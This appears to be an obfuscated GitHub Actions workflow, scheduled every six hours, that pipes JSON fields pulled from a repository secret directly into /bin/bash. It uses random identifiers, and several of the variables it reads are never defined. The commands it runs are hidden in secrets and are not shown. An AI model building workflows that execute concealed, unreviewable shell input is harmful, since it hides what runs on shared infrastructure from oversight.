name: xiaozhumei5678
on:
  workflow_dispatch:
  schedule:
    - cron: '27 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaozhumei5678
        env:
          rfrxy3383: ${{ secrets.rfrxy3383 }}
        run: |
          echo $rfrxy3383 | jq -r .pbkq7496 | /bin/bash
          echo $di5162 | jq -r .orbn32952 | /bin/bash
          echo $igqtk666 | jq -r .qpsyv04298 | /bin/bash
          echo $dcjrz04914 | jq -r .u7 | /bin/bash
          echo $dwh8877 | jq -r .ze685 | /bin/bash
          echo $ubdym020 | jq -r .jhis74838 | /bin/bash
          echo $q9 | jq -r .wdse5042 | /bin/bash
          echo $hk453 | jq -r .gq0 | /bin/bash

